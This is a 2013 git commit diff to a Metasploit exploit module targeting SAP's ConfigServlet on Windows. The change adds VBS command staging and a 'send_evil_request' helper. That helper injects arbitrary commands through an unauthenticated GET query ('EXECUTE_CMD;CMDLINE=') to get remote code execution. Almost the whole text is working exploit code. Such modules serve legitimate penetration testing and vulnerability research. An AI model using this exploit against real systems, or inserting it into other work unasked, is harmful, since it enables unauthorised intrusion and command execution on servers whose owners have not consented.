implement CmbStagerVBS payload execution

2013-04-20 16:37:47 +02:00 · 2013-04-20 16:37:47 +02:00 · e36b58169b
parent 8244c4dcac
commit e36b58169b
1 changed files with 26 additions and 15 deletions
--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
@ -2,6 +2,7 @@ require 'msf/core'

 class Metasploit3 < Msf::Exploit
 	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::CmdStagerVBS

 	def initialize(info = {})
 		super(update_info(info,
@ -49,28 +50,37 @@ class Metasploit3 < Msf::Exploit
 	end

 	def exploit
-		begin
-			print_status("#{rhost}:#{rport} - Exploiting remote system")
-			uri = normalize_uri(target_uri.path, 'ConfigServlet')
+		print_status("#{rhost}:#{rport} - Exploiting remote system")
+		uri = normalize_uri(target_uri.path, 'ConfigServlet')

-			if target['Arch'] == ARCH_CMD
-				res = send_request_cgi(
-					{
-						'uri' => uri,
-						'method' => 'GET',
-						'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(payload.encoded)
-					})
-			else
-				# FIXME
-			end
+		if target['Arch'] == ARCH_CMD
+			send_evil_request(uri, payload.encoded)
+		else
+			execute_cmdstager( { :linemax => 500, :nodelete => true, :sap_configservlet_uri => uri })
+		end
+	end
+
+	def execute_command(cmd, opts)
+		vprint_status("Attempting to execute: #{cmd}")
+		send_evil_request(opts[:sap_configservlet_uri], cmd)
+	end
+	
+	def send_evil_request(uri, cmd)
+		begin
+			res = send_request_cgi(
+				{
+					'uri' => uri,
+					'method' => 'GET',
+					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(cmd)
+				})

 			if !res or res.code != 200
 				print_error("#{rhost}:#{rport} - Exploit failed.")
-				return
+				fail_with(Exploit::Failure::UnexpectedReply)
 			end
 		rescue ::Rex::ConnectionError
 			print_error("#{rhost}:#{rport} - Failed to connect to the server")
-			return
+			fail_with(Exploit::Failure::Unreachable)
 		end

 		if res.body.include?("Process created")
@ -78,6 +88,7 @@ class Metasploit3 < Msf::Exploit
 		else
 			print_error("#{rhost}:#{rport} - Exploit failed.")
 			vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
+			fail_with(Exploit::Failure::PayloadFailed)
 		end
 	end
 end